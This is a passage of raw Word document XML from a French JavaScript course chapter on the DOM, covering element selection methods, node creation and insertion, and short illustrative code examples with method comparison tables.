        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>reduce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applique un accumulateur à chaque élément et renvoie la valeur finale.</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Une flèche n'a pas de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> propre : elle capture celui de la portée où elle est définie.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>toSorted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie une copie triée ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trie en place.</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Il clone récursivement les objets imbriqués, contrairement au spread.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>26. Le DOM et la manipulation de la page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lire, créer et modifier le document depuis JavaScript, sans casser l'accessibilité ni les performances.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 25</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Comprendre la différence entre HTML source et DOM vivant.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Sélectionner efficacement des éléments.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Créer, insérer, déplacer et supprimer des nœuds.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Modifier les classes et les attributs sans écraser l'existant.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Éviter les manipulations coûteuses et les fuites mémoire.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>26.1 Le DOM n'est pas votre HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le navigateur analyse le HTML et construit un arbre d'objets : le DOM. Cet arbre peut différer du source — une balise non fermée est corrigée, un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;tbody&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est ajouté, un script peut tout modifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="35" name="Picture 35"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f33.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.33 — Du fichier au DOM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le DOM évolue, le fichier reste intact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&lt;ul id="liste"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;li&gt;Un&lt;/li&gt;</w:t>
        <w:br/>
        <w:t>&lt;/ul&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const ul = document.getElementById("liste");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  console.log(ul.children.length);   // 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ul.insertAdjacentHTML("beforeend", "&lt;li&gt;Deux&lt;/li&gt;");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  console.log(ul.children.length);   // 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  // Le fichier source n'a pas changé : seul le DOM a évolué.</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</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NŒUD</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Élément de l'arbre DOM : élément HTML, texte, commentaire ou document. Tous héritent de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Node</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, mais seuls les éléments héritent de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Element</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>26.2 Sélectionner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>querySelector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie le premier élément correspondant à un sélecteur CSS, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>querySelectorAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une liste statique. Les méthodes plus anciennes restent utiles pour leur rapidité et leur clarté.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.82 — Six méthodes de sélection</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95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Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Retour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>querySelector</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Premier élément ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sélecteur CSS complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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querySelectorAll</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NodeList</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> statique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Non vivante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>getElementById</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Élément ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Très rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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getElementsByClassName</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HTMLCollection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> vivante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Se met à jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>closest</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Ancêtre correspondant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Idéal en délégation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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matches</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Booléen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Test de sélecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Sélections courantes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const bouton = document.querySelector(".bouton--principal");</w:t>
        <w:br/>
        <w:t>const cartes = document.querySelectorAll(".carte");</w:t>
        <w:br/>
        <w:t>const titre = document.getElementById("titre-page");</w:t>
        <w:br/>
        <w:br/>
        <w:t>cartes.forEach(carte =&gt; carte.classList.add("carte--chargee"));</w:t>
        <w:br/>
        <w:br/>
        <w:t>// `closest` remonte l'arbre depuis un enfant</w:t>
        <w:br/>
        <w:t>const lien = document.querySelector("a");</w:t>
        <w:br/>
        <w:t>const carteParente = lien.closest(".carte");</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`QUERYSELECTORALL` N'EST PAS VIVANTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NodeList</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> renvoyée par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>querySelectorAll</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ne change pas quand le DOM évolue. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>getElementsByClassName</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> renvoie au contraire une collection vivante, ce qui surprend dans une boucle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>26.3 Créer et insérer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois familles s'offrent à vous : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>createElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>insertAdjacentHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. La première est rapide à écrire mais risque l'injection ; la deuxième est sûre mais verbeuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre façons d'ajouter un élément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1. innerHTML : lisible, mais interprète le HTML</w:t>
        <w:br/>
        <w:t>liste.innerHTML += "&lt;li&gt;Trois&lt;/li&gt;";</w:t>
        <w:br/>
        <w:br/>
        <w:t>// 2. createElement : sûr, explicite</w:t>
        <w:br/>
        <w:t>const li = document.createElement("li");</w:t>
        <w:br/>
        <w:t>li.textContent = "Quatre";          // échappe le contenu</w:t>
        <w:br/>
        <w:t>liste.append(li);</w:t>
        <w:br/>
        <w:br/>
        <w:t>// 3. insertAdjacentHTML : compromis</w:t>
        <w:br/>
        <w:t>liste.insertAdjacentHTML("beforeend", "&lt;li&gt;Cinq&lt;/li&gt;");</w:t>
        <w:br/>
        <w:br/>
        <w:t>// 4. Modèle : idéal pour les structures répétées</w:t>
        <w:br/>
        <w:t>const modele = document.getElementById("modele-item");</w:t>
        <w:br/>
        <w:t>const clone = modele.content.cloneNode(true);</w:t>
        <w:br/>
        <w:t>clone.querySelector(".item__nom").textContent = "Six";</w:t>
        <w:br/>
        <w:t>liste.append(clone);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.83 — Six méthodes d'insertion</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95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Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Position</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>append</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Dernier enfant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sûre (nœuds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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prepend</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Premier enfant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Sûre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>before</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Avant l'élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sûre</w:t>
            </w:r>
